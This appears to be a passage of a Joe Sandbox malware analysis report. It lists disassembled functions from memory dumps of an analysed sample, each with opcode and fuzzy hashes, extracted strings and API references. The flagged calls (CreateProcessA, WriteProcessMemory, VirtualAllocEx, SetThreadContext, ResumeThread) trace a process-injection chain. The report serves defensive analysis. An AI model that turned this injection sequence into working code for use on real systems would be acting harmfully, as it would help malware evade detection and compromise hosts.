                                                          • Opcode ID: 7dda69b0958e69f09127ab1db34fc98ba7e3f8daeac3643877a5f0ba960d37f5
                                                          • Instruction ID: e833a4986c81a24292f56ee9541461df15d1e79d3925c56500ba0c9875d51895
                                                          • Opcode Fuzzy Hash: 7dda69b0958e69f09127ab1db34fc98ba7e3f8daeac3643877a5f0ba960d37f5
                                                          • Instruction Fuzzy Hash: E701C275900208AFC708DF55D490CDABBF5FF58300B10C1AED92A4BB60DB30EA04CB91
                                                          Function 03397E50 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hbq$d8cq
                                                          • API String ID: 0-70480990
                                                          • Opcode ID: c09a93c302fa9e08c406e682dc609719d7a098eef6b2b60f74301eba3fa4c35a
                                                          • Instruction ID: 4ae50d76a7274c76a0d1360d996f96456bd858c3de94c7cd1825a52ec4163060
                                                          • Opcode Fuzzy Hash: c09a93c302fa9e08c406e682dc609719d7a098eef6b2b60f74301eba3fa4c35a
                                                          • Instruction Fuzzy Hash: 42127F34640708DFDB06DB68E994B197BA7FF88300F108469E8055B7A9CB3DACC9EB55
                                                          Function 0339F7A0 Relevance: 2.8, Strings: 2, Instructions: 301COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$d
                                                          • API String ID: 0-3334038649
                                                          • Opcode ID: 6e4a9af983ed4ce69801efed63ae6351c849fea7f075ad53d6f4596b7ef20919
                                                          • Instruction ID: c6df4f398ea672dc4e9d402d1c56efd9074227c70461ff8c59103138419aeebb
                                                          • Opcode Fuzzy Hash: 6e4a9af983ed4ce69801efed63ae6351c849fea7f075ad53d6f4596b7ef20919
                                                          • Instruction Fuzzy Hash: C9C14934A006058FEB14DF19C58096AB7F6FF88315B29C6AAD85ADB765DB30FC45CB80
                                                          Function 062B2278 Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662165312.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62b0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PO^q$TJcq
                                                          • API String ID: 0-3011750398
                                                          • Opcode ID: e89f43320e7e13a9909df49db853f8feafe092ece030a42be5b1d3f00ae64048
                                                          • Instruction ID: 35045223261d326bf8f1c0457252b4944c9234d9b05920be578dd039480c097d
                                                          • Opcode Fuzzy Hash: e89f43320e7e13a9909df49db853f8feafe092ece030a42be5b1d3f00ae64048
                                                          • Instruction Fuzzy Hash: 42419930A15305EFD705DB68D890AAEBFF9EFC5350F1484AAE846DF391DA70AD048791
                                                          Function 062B0001 Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662165312.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62b0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJcq$Te^q
                                                          • API String ID: 0-918715239
                                                          • Opcode ID: 1d7ad706b7ac8c6a3efdbb60e5c6be2b4439ea8342402cf5343aa0c78f24f9b0
                                                          • Instruction ID: 9a79860dad0fed2de097cc9a19a6a3ba85639e8d023959b56e0d019429b29150
                                                          • Opcode Fuzzy Hash: 1d7ad706b7ac8c6a3efdbb60e5c6be2b4439ea8342402cf5343aa0c78f24f9b0
                                                          • Instruction Fuzzy Hash: DB31D2306093814FD7169B78D8A866EBFF6EF86200F1904EFD486DB292C9245D09C7A6
                                                          Function 6CF68D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,6CF68C13,?,6CF68CD3,?,6CF68C13,00000000,?,?,6CF68C13,?,?), ref: 6CF68D73
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,6CF68CD3,?,6CF68C13,00000000,?,?,6CF68C13,?,?), ref: 6CF68D8C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 3168844106-0
                                                          • Opcode ID: 4dadff4a7d3237962875ed6cb506ec2149632299e0d157e1bde1eda21bd41857
                                                          • Instruction ID: 90489ed913f20c33886c0fb928d733f3cf97d4bf2991cf2c62fdc39ea20fe599
                                                          • Opcode Fuzzy Hash: 4dadff4a7d3237962875ed6cb506ec2149632299e0d157e1bde1eda21bd41857
                                                          • Instruction Fuzzy Hash: D821F875200109EF8B04DF99D890DAAB3BAFFC9314B148549F91A97750CB31EE16CBA1
                                                          Function 062B0048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662165312.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62b0000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJcq$Te^q
                                                          • API String ID: 0-918715239
                                                          • Opcode ID: d8bdd28470b8b8ca4952394ae1e930fd6382e0a618d773d8e8ded1d6bcc663e2
                                                          • Instruction ID: bd5b68c3777459bd7d4501580faf6719c539fa08b91ce0ef71a19307b30eb976
                                                          • Opcode Fuzzy Hash: d8bdd28470b8b8ca4952394ae1e930fd6382e0a618d773d8e8ded1d6bcc663e2
                                                          • Instruction Fuzzy Hash: BD11D330B401155BEB18EBA8D49877FBAE6FFC8600F10442ED507AB390CE219D0987E6
                                                          Function 6CF68BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,6CF66890,?), ref: 6CF68BDD
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6CF68C23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 3168844106-0
                                                          • Opcode ID: 180505ff5cd3061806fbd7f2617e69d46beabcf4ff7032196cd2d4bbadcee6a9
                                                          • Instruction ID: 9f94a1c343446a53ef8bc25afc5750ebf510fbc9d46c080ca516d501b6a1acb3
                                                          • Opcode Fuzzy Hash: 180505ff5cd3061806fbd7f2617e69d46beabcf4ff7032196cd2d4bbadcee6a9
                                                          • Instruction Fuzzy Hash: 0D01DF71705104AFC744DFA9D88499AF7A8FF9D204710426EE945C7B00DB32ED50CBD0
                                                          Function 0339B890 Relevance: 1.9, Strings: 1, Instructions: 612COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teq
                                                          • API String ID: 0-994465419
                                                          • Opcode ID: f8c9d7cea98994a05edbff422e8d44e03da5dd5522f06d071cc32454856ab19a
                                                          • Instruction ID: d973cc6676dc97fd4583a6f8e5eaf3fd6b90a2a061edaf6053e2388bd0eaec47
                                                          • Opcode Fuzzy Hash: f8c9d7cea98994a05edbff422e8d44e03da5dd5522f06d071cc32454856ab19a
                                                          • Instruction Fuzzy Hash: 32429D3A500504EFDB0A9F98D944E55BFB3FF88318B1A84A4E2055F276C73AE865EF50
                                                          Function 062E3355 Relevance: 1.8, APIs: 1, Instructions: 299processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 062E362F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 3089de0a6b6d46faf2297a8a5cc0471ed33fc19214dce3143453c0b6c35396f5
                                                          • Instruction ID: 73d23c02f1940279d71c229988f1684cef12146743cf67dd89104d41ec458ba1
                                                          • Opcode Fuzzy Hash: 3089de0a6b6d46faf2297a8a5cc0471ed33fc19214dce3143453c0b6c35396f5
                                                          • Instruction Fuzzy Hash: BBB13270D1025A8FDF60CFA8C845BEEBBF1BF49305F14916AE858A7290D7748985CF85
                                                          Function 062E3360 Relevance: 1.8, APIs: 1, Instructions: 295processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 062E362F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: f68dabc486ef75304c3b01c9a25c22e72dd480f7aa63d9f95664a7f52ed62597
                                                          • Instruction ID: 0140cfc8ff5b05dc261f82e9f88604520a5e442af7d460334b16737288f54ff6
                                                          • Opcode Fuzzy Hash: f68dabc486ef75304c3b01c9a25c22e72dd480f7aa63d9f95664a7f52ed62597
                                                          • Instruction Fuzzy Hash: 74B13170D1025A8FDF50CFA8C841BEEBBF1BF09305F14916AE858A7290D7748985CF85
                                                          Function 0339FAC0 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq
                                                          • API String ID: 0-149360118
                                                          • Opcode ID: 14894420ab1c937d31b22ba9d772fd6778de33c5bf24dea90a321bab98224084
                                                          • Instruction ID: 74b56ad11e63906f140ad8ab755acc78584a1968bf184cd628fdbeb8c9f4c43a
                                                          • Opcode Fuzzy Hash: 14894420ab1c937d31b22ba9d772fd6778de33c5bf24dea90a321bab98224084
                                                          • Instruction Fuzzy Hash: 27E1AD34A00615CFDB10DF69C8C0A6AFBB5FF89315B15C6AAD829DB356D730E845CB90
                                                          Function 0339B881 Relevance: 1.8, Strings: 1, Instructions: 506COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teq
                                                          • API String ID: 0-994465419
                                                          • Opcode ID: 632a8977a0e3219d67b35c93de181dc41139d7a2be53235a179106ab9fb0732d
                                                          • Instruction ID: 0bfe22f2307e970b36210b3b9d70a56e33e14749e7a67459bb3ec5ed60fd674b
                                                          • Opcode Fuzzy Hash: 632a8977a0e3219d67b35c93de181dc41139d7a2be53235a179106ab9fb0732d
                                                          • Instruction Fuzzy Hash: 1A32573A500504EFDB0A9F94D908E55BFB3FF88318B1A84A8E2055B276C73BD865EF54
                                                          Function 6CF7E2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _malloc
                                                          • String ID:
                                                          • API String ID: 1579825452-0
                                                          • Opcode ID: 67ab28e02b1ca6f8f498ae6b06a8503a389179c2fe984bce6576bd90a11b4cbe
                                                          • Instruction ID: 437f8cacafda6965d7fc21e4c175f61443695d6b633629d4fbba02eaf97b330f
                                                          • Opcode Fuzzy Hash: 67ab28e02b1ca6f8f498ae6b06a8503a389179c2fe984bce6576bd90a11b4cbe
                                                          • Instruction Fuzzy Hash: 6981A5B19083409FEB309F65A48178EBBF0BB51308F14497FD2599BB91D7B585488BA3
                                                          Function 062E3B50 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 062E3C2D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 4134be2b7d8e0b4bb162b358cb92833f8d6ef0db253a6c8f2261e66f5f554b2f
                                                          • Instruction ID: 7d10d91248a65b1b982dc3c1f91bffc9d658a187cd59d9330d1087313d370747
                                                          • Opcode Fuzzy Hash: 4134be2b7d8e0b4bb162b358cb92833f8d6ef0db253a6c8f2261e66f5f554b2f
                                                          • Instruction Fuzzy Hash: 48418AB5D102599FCB10CFA9D984AEEFBF1BF49310F24902AE818B7250D374A945CF64
                                                          Function 062E3B58 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 062E3C2D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 721e14086bd11a6391731e93023add39c0573d0c6fcfaa2eb4d13487becb3bf5
                                                          • Instruction ID: a5e3a0ac869fef0d4ca44dd8576dccc4ca867f6fae0e7272a08d0a7dc3e6ca94
                                                          • Opcode Fuzzy Hash: 721e14086bd11a6391731e93023add39c0573d0c6fcfaa2eb4d13487becb3bf5
                                                          • Instruction Fuzzy Hash: DA4179B5D002589FCB10CFA9D984ADEFBF1BF49310F24902AE818B7250D374A945CF64
                                                          Function 062E3958 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 062E3A0C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 24b11ee20bf254b12a00a05d6f1fc3410fa3383fda1acbba3fbc71bdcdbfc912
                                                          • Instruction ID: ff9fbd1918893243896c831e9e5f3091ca56a2fb9e0e81b7fb13c621e42bcc5e
                                                          • Opcode Fuzzy Hash: 24b11ee20bf254b12a00a05d6f1fc3410fa3383fda1acbba3fbc71bdcdbfc912
                                                          • Instruction Fuzzy Hash: DF4156B9D152589FCF10CFA9D984A9EFBB1AB49310F24A02AE818B7310D775A941CF64
                                                          Function 062E3960 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 062E3A0C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 8bf72984262fd88845b9df8311f55aa108dfa7a8f777a583f5e206c9175d38d0
                                                          • Instruction ID: 018a16d6bd9d3068f826519fb347bb6c7c9e6267dd103f16250f036a89497fbe
                                                          • Opcode Fuzzy Hash: 8bf72984262fd88845b9df8311f55aa108dfa7a8f777a583f5e206c9175d38d0
                                                          • Instruction Fuzzy Hash: 693166B9D012589FCF10CFA9D984ADEFBB1BB49310F24902AE818B7320D375A941CF64
                                                          Function 6CF67140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF82820: _malloc.LIBCMT ref: 6CF82871
                                                          • std::tr1::_Xweak.LIBCPMT ref: 6CF671D2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xweak_mallocstd::tr1::_
                                                          • String ID:
                                                          • API String ID: 4085767713-0
                                                          • Opcode ID: 0984176d663b802abbba7c25f477e6226db9adc1f0040ba012241c1c51b4fb41
                                                          • Instruction ID: e67c1d5754aa3c7653850a07a72525ab217cab01cf0540489e0c0f28c71b00e6
                                                          • Opcode Fuzzy Hash: 0984176d663b802abbba7c25f477e6226db9adc1f0040ba012241c1c51b4fb41
                                                          • Instruction Fuzzy Hash: C53183B4A0574A9FCB10CFA6C880AABB7F9FF49308F24865EE81597B41D731E905CB50
                                                          Function 062E385B Relevance: 1.6, APIs: 1, Instructions: 82threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 062E38EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 57c8c1976b9655b9857a154a23281deb568445345a0320e2e1d8e8751b203600
                                                          • Instruction ID: 5d819a58f755879a59f92a89a2f9d937114572ec6452b232a64171fa08ccb535
                                                          • Opcode Fuzzy Hash: 57c8c1976b9655b9857a154a23281deb568445345a0320e2e1d8e8751b203600
                                                          • Instruction Fuzzy Hash: 0131AAB5D012589FCB10CFA9D984AEEFBF0AB09320F24902AE818B7310D774A944CF64
                                                          Function 062E3860 Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 062E38EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: d9ac6f175bc9af1c6095d7725222c62fa2305377cb9aedf5fb80532aa2ce079f
                                                          • Instruction ID: 1b2d85316ff4e74cee1438b715e4c6d44873f8d551175066245ca9244ce9491e
                                                          • Opcode Fuzzy Hash: d9ac6f175bc9af1c6095d7725222c62fa2305377cb9aedf5fb80532aa2ce079f
                                                          • Instruction Fuzzy Hash: E5319BB5D01258DFCB10CFA9D584AEEFBF0AB09314F24946AE818B7310D775A945CF64
                                                          Function 062E3D03 Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ResumeThread.KERNELBASE(?), ref: 062E3D85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: f424fee3e67a2d29be4eea82c42eafa50c9245381545f8806c7695061b5bb5ea
                                                          • Instruction ID: 302f804c89c3ecf81b26fdfa8c6120681c16d1860a914308eef3eb9b3276688d
                                                          • Opcode Fuzzy Hash: f424fee3e67a2d29be4eea82c42eafa50c9245381545f8806c7695061b5bb5ea
                                                          • Instruction Fuzzy Hash: 4531ACB8D112589FDB10CFA9D984ADEFBF4EB09310F14902AE818B7310C774A940CFA4
                                                          Function 062E3D08 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ResumeThread.KERNELBASE(?), ref: 062E3D85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662245227.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_62e0000_file.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 551b5e426b4a7ef63929b0466916c7901b33c50da2604f1c8875fc1d991bf889
                                                          • Instruction ID: f3b3441660f2ed39eeedb519d60995b39ae11c42b72db4daa7f8704b2ad1c5d7
                                                          • Opcode Fuzzy Hash: 551b5e426b4a7ef63929b0466916c7901b33c50da2604f1c8875fc1d991bf889
                                                          • Instruction Fuzzy Hash: 6F319AB8D112589FCB10CFA9D984ADEFBF4AB49320F14942AE818B7310D775A941CFA4
                                                          Function 0339E023 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CB
                                                          • API String ID: 0-2813831398
                                                          • Opcode ID: 117fe7bbba0742a58438b2e75c4f072ea2f8e2f9d946e2d549c47d395da9c79e
                                                          • Instruction ID: cccf1a61ca14eda1b4c978c31e3cccdad41ac6a4906e336de423bb63d575e197
                                                          • Opcode Fuzzy Hash: 117fe7bbba0742a58438b2e75c4f072ea2f8e2f9d946e2d549c47d395da9c79e
                                                          • Instruction Fuzzy Hash: 9CA16975A04610CFDB18DF28D8D492DBBF5BF8971471688AAE856DF762CA30EC08CB50
                                                          Function 6CF7EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • SysAllocString.OLEAUT32 ref: 6CF7EA8D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
